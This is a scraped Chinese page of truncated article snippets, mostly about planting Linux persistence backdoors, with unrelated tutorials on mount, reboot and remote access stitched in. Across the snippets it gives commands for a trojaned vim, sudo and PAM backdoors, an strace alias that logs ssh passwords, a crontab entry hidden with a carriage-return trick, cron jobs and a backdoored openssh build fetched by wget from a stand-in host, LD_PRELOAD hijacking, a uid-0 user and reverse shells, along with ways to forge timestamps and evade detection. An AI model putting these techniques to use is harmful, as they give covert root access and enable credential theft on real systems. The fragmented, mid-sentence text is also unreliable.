中打印 flag 变量 现在尝试通过 vim 编辑 1.txt 可以看出,虽然最终 flag 变量的值被修改了,但是系统配置中设置 flag 变量这个操作是成功了的,相信看到这里,部分小伙伴已经对后门有想法了...哪些文件自动加载 $VIMRUNTIME 和 ~/.vim 目录下的部分脚本会在vim启动或运行过程中加载 经过上个小节的洗礼,大家应该已经轻车熟路了,想要确定具体加载了哪些脚本,只需要分别打开有文件类型的文件...制作后门文件 1) 下载源代码 在相同版本的 Linux 主机 B 上下载相同版本 vim 源代码 在主机B上编辑更新源,取消 deb-src 的注释 在主机 B 上下载 vim 源代码(可以指定版本...成功创建了有效的带有后门,且功能正常的 vim 3) 用后门vim替换 /usr/bin/vim 4) 模拟正常使用vim触发后门 成功触发后门 5) 小结 几乎每一种后门都可以用这样的方法...py3file ,实际上可以利用的命令或者函数还是有很多的 4.
$(nohup vim -E -c "py3file demo.py"> /dev/null 2>&1 &) && sleep 2 && rm -f demo....
sudo 经常被用来将普通用户权限提升至 root 权限,代替 root 执行部分程序来管理 Linux 系统,这样避免 root 密码被泄漏 这篇文章介绍了三种利用其留后门的方法,其中也涉及一个sudo...有趣的特性,在极端条件下可能是系统的薄弱点;同时涉及一个没什么人关注的小知识点 sudo 配置后门 sudoedit 文件所有者后门 sudo plugin 后门 这篇文章以 Ubuntu Server...22.10 为例 0x01 sudo 配置后门 1) 简介 通常的应用场景中,配置 sudo 主要是用来赋予某个用户或者用户组能够以 root(或其他用户) 的身份(以及权限)执行部分(或全部) 程序...123456' | sudo -S cat /etc/passwd 可以考虑搞新建 空白文件名 文件 + alias 劫持的方法来隐藏新建文件 有时候也没必要新建用户,可以尝试开启那些系统用户试试,或许有惊喜也说不定...,但是这种操作一定要提前试一试 0x02 sudoedit 文件所有者后门 这个后门更偏向于一个概念性的后门,以趣味性为主吧 前段时间复现 CVE-2023-22809 的时候关注到 sudoedit
这里有我们熟悉的 ll 命令,这个命令的真实含义其实是 ls -alF ?.../etc/profile 、 /etc/bashrc 、~/.bashrc、~/.bash_profile 、~/.profile 、~/.bash_logout /etc/profile 【系统级】Linux...%h%m%s'`.log -e read,write,connect -s2048 ssh' 上面是我搜索了10多篇文章,发现的同一条后门命令,既然有前辈写了,咱们就分析分析 上面后门中,其实 alias...调试性能问题,查看系统调用的频率,找出耗时的程序段 查看程序读取的是哪些文件从而定位比如配置文件加载错误问题 查看某个php脚本长时间运行“假死”情况 当程序出现“Out of memory”时被系统发出的...把strace的输出单独写到指定的文件 /tmp/sshpwd-xxx.log ,这个没啥好说的 -e read,write,connect Linux内核目前有300多个系统调用,详细的列表可以通过
Ubuntu server 16.04 默认 /etc/ssh/ssh_config
有一个更易用的变种htop。 ps:显示系统所有运行中进程的一个快照。输出可以定制成显示PID、PPID、用户、负载、内存、积累的用户/系统时间、启动时间、以及更多。...有一个变种pstree可以用树结构显示进程。 nethogs:一个带宽监视工具,按进程来分组显示活动网络连接,实时汇报每个进程占用的(上传/下载)带宽。
Linux 计划任务是一项服务,由 cron 工具来完成,主要目的就是在无需人工干预的情况下运行作业 PS: 功能较为简单的at命令在Ubuntu 16.04中已经不自带了 0x01 cron服务简介...看起来像是一个文件,因为有注释有空格,那么究竟是不是一个文件呢?一会儿再说吧(Linux上万物皆文件,肯定是文件啦!)...3 * * * rm -r /home/xxxx/test/* 每隔10分钟下载一下我们的木马 */10 * * * * wget http://www.test.com/muma.exe 0x05 后门利用...0x06 巧用计划任务留后门 (crontab -l;printf "*/1 * * * * /home/helper/1.sh;\rno crontab for `whoami`%100c\n")|crontab...可以看到,果然是有差异的,使用 crontab -e 来进行查看一下 ?
0x00 前情提要 在 alias 后门 | Linux 后门系列一文中,我们为了让后门完美一些,修改了后门文件的 atime、mtime,但是 ctime 一直没有办法修改,今天我们来把这一块补齐,...让后门更加完美 atime -> access time, 访问时间 mtime -> modify time,修改时间 ctime -> change time, 状态变化时间 最新版 Linux 中多了一个属性...,在修改系统时间之前可以先看一下系统时间和硬件时间是否有较大差距 sudo hwclock --show && date +"%Y-%m-%d %H:%M:%S" 可以看到,差距不大,可以考虑从硬件时间恢复系统时间...这边依旧使用Ubuntu Server 中的 9 个步骤,不过Centos Stream 9 中没有 /etc/update-manager/这个文件夹,我们选择 /etc/selinux/ 这个目录 这里有一个...0x09 信息征集 Centos 8 官方已于21年底停止了支持,请问大家公司将 Centos 换成哪些系统了呢?
需要的知识点更高一些 动态链接库加载过程中会先加载 LD_PRELOAD 指向的变量,这样我们可以利用这个先加载来进行劫持正常的函数和命令 这次我们劫持 whoami 命令 ,查看一下 whoami 命令都调用了哪些库函数...可以看到这里有一个 whoami ,我们就劫持它,思路如下: 覆盖这个函数,并且在内部重写 先把原函数指针赋值给一个变量 执行我们的代码 执行原函数 正常返回值 preload.c #include...加固后门 正常大家检查是否存在 LD_PRELOAD 后门的时候都是直接 echo $LD_PRELOAD ?...成功劫持 export 没有设置后门时候是这样的 ? 设置后门后是这样的 ?...劫持成功 现在我们来进行验证后门还好用吗 ? 可以看到后门可以使用,那么现在我们来看一下以上各种方法还能否看见我们做的手脚 ? 完美!
这篇文章主要讲解了“Linux远程连接的方法有哪些”,文中的讲解内容简单、清晰、详细,对大家学习或是工作可能会有一定的帮助,希望大家阅读完这篇文章能有所收获。...不过在说怎样连接之前还是要先明确一个概念,为什么我标题没有用linux中的远程桌面连接呢,这是因为Linux下面的桌面,也就是我们所说的X Window ,只是linux下的一个应用程序而已, 所以linux...先说说通过SSH(Secure Shell)连接到linux下的shell,如果的操作平台是windows下,你可以下载SSH客户端工具连接到linux,比如最常用的PuTTY,你可以去这里下载: http...提起VNC大家肯定不要陌生,它是一个踌平台的远程控制软件, 有linux上装好它的服务器端,我们就可以通过客户端来进行连接了。...现在大家对于Linux远程连接的方法有哪些的内容应该都有一定的认识了吧,希望这篇能对大家有所帮助。
,是Linux中发送问候消息的功能,一般在我们登录服务器后显示 每次任意用户登录时都会触发motd服务的功能,这个功能的脚本几乎都是使用root 权限来启动的,所以很适合用来做后门 实用部分 随着关注我们的朋友越来越多...root权限 留后门 这个目录下的所有文件在任意用户登录后都会执行一遍,所以我们可以选择新建一个脚本或者修改其中的脚本来完成留后门的目的 以 00-header 文件为例 #!...有文章说这个操作是为了当存在一些漏洞的时候,Ubuntu可以通过这个方式来传递给我们,也有文章指出是为了打一些广告 到这里我懵了呀, 根本没有执行 /etc/update-motd.d/ 文件夹中的任何脚本...答案是并不会,此时我怀疑是不是对目录权限有要求,所以我复制了 /etc/update-motd.d 这个目录的权限,之后创建了新的脚本 结果还是不会执行 source 和 ....来加载配置文件呀,这完全可以作为一个单独的后门方式去讲,但这里已经讲了就不单独开章节了 我们在 Ubuntu 18.04 中简单搜索一下 粗略的计算有 196 个 这就是说这些文件中我们都可以塞进去一些恶意程序
ssh/ssh_config /etc/ssh/ssh_config.old 2、mv /etc/ssh/sshd_config /etc/ssh/sshd_config.old 3、下载并安装ssh后门...: 将sshdb.tgz后门程序放置到你自己的服务器的某目录下,并且改成为test.tgz,这里为www.test.com的根目录下 # wget http://www.test.com/test.tgz...# tar zxvf test.tgz # cd openssh 4、设置ssh后门的登录密码: vi includes.h define _SECRET_PASSWD "test1234" ->...#test1234位后门连接密码 5、编译安装: # ....ssh_config touch -r /etc/ssh/sshd_config.old /etc/ssh/sshd_config 重启服务 # /etc/init.d/sshd restart 6、登入后门
d在我们攻防当中,常常会碰到linux机器,拿到之后为了避免发现 低权限升高权限 创建一个c文件 #include int main() { setuid(0);
perl 和 Python 在做反弹shell基本差不多,Python 那一节有点讲的太多了,大家可以对比一下参数,照着Python的思路移到 perl 上,我...
Linux 中的通配符详解及实例 一 通配符 二 实战 [root@localhost ~]# mkdir dy [root@localhost ~]# cd dy [root@localhost dy...root@localhost dy]# echo $(date) Sat Jul 15 17:23:31 CST 2017 [root@localhost dy]# echo \$bb $bb 以上就是Linux...如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
在 Linux 系统中,挂载命令允许您将文件系统附加到指定的目录,使其在文件系统层次结构中可访问。挂载命令在管理磁盘和文件系统时非常有用,可以用于挂载硬盘分区、网络共享、光盘镜像等。...本文将详细介绍 Linux 中常用的挂载命令,以及它们的参数和用法。通过掌握这些命令,您可以轻松地挂载和管理不同类型的文件系统。图片1. mount 命令mount 命令用于挂载文件系统到指定的目录。...以下是 mount -l 命令的用法:mount -l图片结论本文介绍了 Linux 中常用的挂载命令及其用法,包括 mount、umount、mount -a、df、du、mount -o loop、...通过学习这些命令,您可以在 Linux 系统中轻松地挂载和管理不同类型的文件系统,实现文件的共享、访问和重定向。
在 Linux 系统中,重启是一项常见的操作,它允许我们重新启动系统以使更改生效或解决一些问题。虽然大多数用户可能熟悉传统的 reboot 命令来重启系统,但实际上还有其他几个命令可以完成相同的任务。...在本文中,我们将详细介绍 Linux 中可用的不同重启命令,并了解它们的工作原理和用法。图片1. rebootreboot 命令是最常用和最常见的重启命令之一。它可以立即重启系统,使所有更改生效。...4. systemctl在使用系统采用 Systemd 进程管理器的 Linux 发行版时,我们可以使用 systemctl 命令来管理系统服务和进行重启操作。...特别是使用以下命令:shutdown -r now6. initctl对于使用 Upstart 进程管理器的某些 Linux 发行版,可以使用 initctl 命令来管理系统和进行重启操作。...结论在 Linux 系统中,我们有多种命令可用于重启系统。
UnixBash 远控后门 简介 利用 Unix/Linux 自带的 Bash 和 Crond 实现远控功能,保持反弹上线到公网机器。...nc -vv -lp 53 Linux/Unix 藏文件和文件夹 Linux/Unix 下想藏 Webshell 或者后门什么的,可以利用一下隐藏文件夹和文件。 方法一 比如创建一个名字开头带 ....利用方法 useradd -o -u 0 backdoor Linux/Unix 修改文件时间戳 简介 Unix 下藏后门必须要修改时间,否则很容易被发现,直接利用touch就可以了。...因为 bash2 针对 suid有一些护卫的措施....PAM最初是集成在Solaris中,目前已移植到其它系统中,如Linux、SunOS、HP-UX9.0等。 搭建PAM后门主要思路:pam_unix_auth.c打补丁安装到正常的PAM模块中。
注入式攻击”也就是可以向 bash注入一段命令,从bash1.14到4.3都存在这样的漏洞; 漏洞编号:CVE-2014-6271 详细情况:Bash(GNU Bourne-Again Shell)是大多数Linux...Bash其广泛的使用将意味全球至少 150 万的主机将受到影响,此外 Linux/Unix 世界内的安卓和苹果都难以幸免。
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
即时通信 IM
ICP备案
对象存储
实时音视频
